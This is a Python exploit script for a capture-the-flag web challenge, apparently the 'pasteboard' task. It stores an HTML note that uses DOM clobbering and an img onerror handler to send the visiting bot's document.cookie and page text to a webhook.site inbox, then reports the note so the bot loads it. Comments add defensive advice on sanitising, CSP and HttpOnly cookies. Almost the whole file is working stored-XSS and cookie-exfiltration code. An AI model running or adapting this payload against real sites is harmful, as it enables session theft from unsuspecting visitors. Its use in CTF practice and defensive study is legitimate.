import requests

# Challenge instance under test and the request-capture inbox used as the
# out-of-band sink. The inbox URL acts as a bearer link: anyone who holds it
# can read whatever is captured there, so treat it as sensitive.
BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# Note body submitted to the paste service.
#
# What the markup does, as far as this file shows:
#   * a form with id "errorReporter" containing an input named "path"
#     (id "pathInput"),
#   * an <img> whose inline onerror handler first writes a protocol-relative
#     URL (cookie plus the first 200 characters of the page text in the query
#     string) into that input, then sets window.lastRenderError and throws.
# The value is written before the throw so that the URL loaded afterwards
# already carries the data.
#
# NOTE(review): this presumably depends on page script that reads
# errorReporter/path after a render error and loads it as a script; that
# code is not in this file, so confirm against the application source.
#
# Defensive takeaways for the application side: sanitise note HTML so that
# user-controlled id/name attributes cannot shadow elements the page's own
# script looks up, strip inline event-handler attributes, restrict script-src
# to the application's origin with a CSP, and mark session cookies HttpOnly
# so document.cookie does not expose them. Outbound script requests to
# unfamiliar hosts with long query strings are a useful detection signal.
_exfil_target = "//" + WEBHOOK.replace("https://", "")

# Statements of the inline handler, joined with ";" exactly as in the
# single-line form.
_onerror_js = ";".join([
    "document.getElementById('pathInput').value="
    f"'{_exfil_target}/steal.js?flag='"
    "+encodeURIComponent(document.cookie)"
    "+'&body='+encodeURIComponent(document.body.innerText.substring(0,200))",
    "window.lastRenderError='triggered'",
    "throw new Error()",
])

payload = "\n".join([
    '<form id="errorReporter">',
    '<input name="path" id="pathInput">',
    "</form>",
    f'<img src=x onerror="{_onerror_js}">',
])

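# Seconds to wait on each HTTP call. requests applies no timeout by default,
# so without this the script blocks forever if the host stops answering.
REQUEST_TIMEOUT = 15

print("[*] Crafting exploit that embeds data in script URL...")
print(f"[*] When bot visits, it will request: {WEBHOOK}/steal.js?flag=<cookie_data>")
print()

session = requests.Session()

# Step 1: store the note. Redirects are not followed so that the path of the
# new note can be read from the Location header of the 302 response.
try:
    resp = session.post(
        f"{BASE_URL}/note/new",
        data={"title": "Final", "body": payload},
        allow_redirects=False,
        timeout=REQUEST_TIMEOUT,
    )
except requests.RequestException as exc:
    raise SystemExit(f"[-] Paste creation request failed: {exc}")

location = resp.headers.get("Location")

if resp.status_code == 302 and location:
    note_url = f"{BASE_URL}{location}"

    print(f"[+] Created: {note_url}")

    # Step 2: submit the note's path to the report endpoint; a 202 is taken
    # to mean the visit was queued.
    try:
        report_resp = session.post(
            f"{BASE_URL}/report",
            data={"url": location},
            timeout=REQUEST_TIMEOUT,
        )
    except requests.RequestException as exc:
        raise SystemExit(f"[-] Report request failed: {exc}")

    if report_resp.status_code == 202:
        # Derive the inbox id from WEBHOOK rather than repeating the token,
        # so the two cannot drift apart when the inbox is rotated.
        inbox_id = WEBHOOK.rstrip("/").rsplit("/", 1)[-1]

        print("[+] Reported to bot!")
        print()
        print("[*] Check webhook in 30-40 seconds:")
        print(f"    https://webhook.site/#!/{inbox_id}")
        print()
        print("[*] Look for GET request to /steal.js with 'flag' parameter")
        print("[*] The flag will be in the query string!")
    else:
        print(f"[-] Report failed: {report_resp.status_code}")
elif resp.status_code == 302:
    # A redirect without a target would otherwise yield a URL ending in
    # "None" and a report for a note that does not exist.
    print("[-] Paste creation returned 302 without a Location header")
else:
    print(f"[-] Paste creation failed: {resp.status_code}")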
